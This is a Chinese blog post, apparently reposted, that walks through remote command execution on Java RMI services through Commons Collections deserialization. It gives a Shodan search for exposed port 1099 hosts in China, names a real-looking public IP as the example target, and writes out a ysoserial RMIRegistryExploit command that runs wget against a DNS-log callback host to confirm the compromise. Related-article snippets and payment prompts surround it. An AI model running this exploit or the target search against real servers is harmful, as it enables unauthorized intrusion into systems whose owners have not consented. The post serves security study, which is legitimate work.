Java RMI服务远程命令执行利用

最新推荐文章于 2024-05-12 21:52:27 发布
最新推荐文章于 2024-05-12 21:52:27 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 渗透学习

http://www.myhack58.com/Article/html/3/62/2016/71978.htm

Java RMI服务是远程方法调用(Remote Method Invocation)。它是一种机制,能够让在某个java虚拟机上的对象调用另一个Java虚拟机的对象的方法。

在Java Web中,很多地方都会用到RMI来相互调用。比如很多大型组织都会在后台部署一些Java应用,用于对外网站发布更新的静态页面,而这种发布命令的下达使用的就是这种RMI形式。
值得注意的是,RMI传输过程必然会使用序列化和反序列化,如果RMI服务端端口对外开发,并且服务端使用了像Apache Commons Collections这种库,那么会导致远程命令执行。
首先来看利用。
0x01 漏洞利用
搜索shodan:https://www.shodan.io/search?query=port%3A%221099%22+country%3A%22CN%22
可以看到还是有很多案例的,这里提取一个案例来演示:
场景:182.92.214.221服务器开放了1099端口(RMI服务的默认开放端口),且暴露在公网中,并且恰好使用了Apache Commons Collections的缺陷版本,我们需要在这台服务器上执行命令。
工具:
(1)ysoserial-0.0.3-all.jar
下载地址https://github.com/frohoff/ysoserial
(2)java环境
执行命令时,为了验证是否真正成功,我使用cloudeye来验证:
wget http://ddabcc.dnslog.info?hello
上面的url是我的cloudeye的地址(打码了)。
执行:
java -cp ysoserial-0.0.3-all.jar ysoserial.exploit.RMIRegistryExploit 43.224.227.* 1099  CommonsCollections1 "wget http://ddabcc.dnslog.info?hello"
虽然看到抛出异常了,但是我们的命令已经执行了,查看cloudeye:
0x02 简单的分析
注意到漏洞利用中的命令行里出现了ysoserial.exploit.RMIRegistryExploit,我就手贱去看了一下源码,exp的逻辑很清晰,我加了些批注看这个代码片段,似乎是注册RMI服务的过程中就被pwned了,反正原理很简单。
手艺人123
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java远程调用中的RMI构建远程服务
韩浪的博客
08-19 905
在程序设计中,我们经常会遇到多进程交互,多进程协同工作,分布式任务处理等这样的场景,在这些场景中我们都会涉及到远程通信与远程调用,下面我们用java提供的rmi远程调用来构建一个远程服务 一、RMI用法 java语言提供了一种很简便的远程调用,就是RMI,下面我们来看一下RMI的用法 首先,我们定义一个接口/** * 这个接口必须继承自java.rmi.Remote */ p
Java RMI(远程方法调用)入门
liinux-Talk is cheap,show me the code.
03-06 137
RPC RPC(Remote Procedure Call,远程过程调用)是一种通信协议,它通过网络从远程计算机程序上请求服务,而不需要了解底层网络技术的协议。一个通俗的例子:两台服务器A和B,有一个应用程序部署在A上,它想调用B上的应用提供的函数/方法,由于它们不在同一个内存空间,不能直接调用,需要通过网络来表达调用的语义和需要传输的数据。 为此RPC需要做以下方面的工作: 通讯:RPC ...
Java RMI 远程代码执行漏洞
LuckySec
11-30 3277
Java RMI服务是远程方法调用,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。在RMI的通信过程中,默认使用序列化来完成所有的交互,如果该服务Java RMI端口(默认端口1099)对公网开放,且使用了存在漏洞的Apache Commo
Java RMI SERVER命令执行漏洞
最新发布
m0_62670778的博客
05-12 390
RMI全称是Remote Method Invocation(远程方法调用),是专为Java环境设计的远程方法调用机制,远程服务器提供API,客户端根据API提供相应参数即可调用远程方法由此可见,使用RMI时会涉及到参数传递和结果返回,参数为对象时,要求对象可以被序列化。
【CVE-2017-3241】Java RMI远程反序列化代码执行
changlu1119的博客
03-27 4636
对于Java RMI,只要是以对象为参数的接口,都可以在客户端构建一个对象,强迫服务端对这个存在于Class Path下可序列化类进行反序列化,从而执行一个不在计划内的方法。 一、了解什么是Java RMI? RMI(Remote Method Invocation),即远程方法调用 1.1 是什么? RMI是一个通信工具,支持存储于不同空间的应用级对象之间进行通信的工具,实现了远程对象之间的无缝调用。 用于不同虚拟机之间的通信,通信的虚拟机可以不在同一个服务器。 RMI是标识了一些对象,允许被其.
Java反序列化漏洞被忽略的大规模杀伤利用
weixin_34292402的博客
01-17 115
编者按:2015年11月6日,国外 FoxGlove安全研究团队于在其博客上公开了一篇关于常见 Java应用如何利用反序列化操作进行远程命令执行的文章。Java在进行反序列化操作的时候会使用ObjectInputStream类调用 readObject()方法去读取传递过来的序列化对象字节流进行处理,利用 Apache Commons Collections 库恰好可以构造出了一个在反序列化操作时...
Java-RMI漏洞利用
2301_76175665的博客
06-16 1534
Java远程方法调用,也就是Java RMI,它是一种机制,允许一个Java虚拟机中的对象去访问和调用另一个Java虚拟机中包含的方法。这与RPC基本相同,但是在面向对象的范例中,而非面向过程,它允许不在同一个地址空间中的Java程序互相通信。192.168.73.130是我们的靶机(metasploitable2),靶机上安装了Java RMI服务(rmiregistry),运行在1099端口上,你也可以通过nmap扫描结果来看这个端口是开放的。在我们的攻击机上使用MSF,搜索java_rmi
RMI:带有命令的远程方法调用聊天服务器应用程序
06-07
**Java RMI(远程方法调用)技术详解** Java RMI(Remote Method ...结合Chat-Server-Application的描述,我们可以看出这是一项实践RMI技术的实例,展示了如何利用RMI实现远程对象间的交互,以支持网络中的聊天服务
Java远程控制源代码
08-31
Java远程控制源代码是关于利用Java编程语言实现远程计算机控制的一种技术实现。远程控制允许用户通过网络在一台设备上操作另一台设备,这对于系统管理、软件测试和协作工作具有重要意义。下面将详细介绍Java中实现...
Java RMI-IIOP相关源代码
03-16
RMI允许Java对象在不同的JVM之间进行远程调用,而IIOP则是CORBA(Common Object Request Broker Architecture)标准的一部分,用于不同对象之间跨网络通信。将这两者结合,Java RMI-IIOP提供了面向接口的、透明的、...
Java RMI远程方法调用详解-例子代码
07-22
Java RMI远程方法调用详解-例子代码,例子详解在:http://blog.csdn.net/guyuealian/article/details/51992182
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
通过Java RMI实现远程调用的一个简单例子
04-02
源代码 博文链接:https://forchase.iteye.com/blog/1454428
java 实现RMI远程调用
06-25
实现java RMI 远程调用,包括 RMIServer RMIClient源码,测试用例。
java spring+rmi 的远程调用例子
10-31
一个基于Spring的rmi实现,测试成功,可以远程调用。
Java RMI-IIOP 相关源代码.rar
07-09
- 如何定义和实现RMI远程接口及其对象。 - RMI注册过程以及如何在服务器端启动ORB。 - 客户端如何通过RMI引用远程对象并进行调用。 - 如何结合EJB和RMI-IIOP实现分布式的业务逻辑。 - BAT批处理命令的使用和服务器/...
一个完整的Java RMI通讯的例子
04-16
Java Remote Method Invocation (RMI) 是Java平台提供的一种分布式计算技术,它允许在不同网络节点上的Java对象之间进行远程调用。在这个例子中,我们将深入理解RMI的基本概念、工作原理以及如何创建一个完整的RMI...
JAVA RMI 反序列化远程命令执行漏洞
热门推荐
LeeHDsniper的博客
05-11 2万+
JAVA RMI 反序列化远程命令执行漏洞 漏洞资料 背景 原理 Payload构造 搭建本地测试环境 开启包含第三方库的RMI服务 测试RMI客户端 攻击测试 升级版攻击 Weblogic Commons-Collections反序列化RCE漏洞CVE-2015-4852JAVA RMI 反序列化远程命令执行漏洞漏洞资料Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-324
java rmi漏洞利用如何执行远程代码
03-05
对于这个问题,我可以回答:Java RMI漏洞利用可以通过构造恶意的RMI请求来执行远程代码。攻击者可以利用这个漏洞来获取系统权限、窃取敏感信息等。为了防止这种漏洞的利用,建议及时更新Java版本,或者禁用Java RMI...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值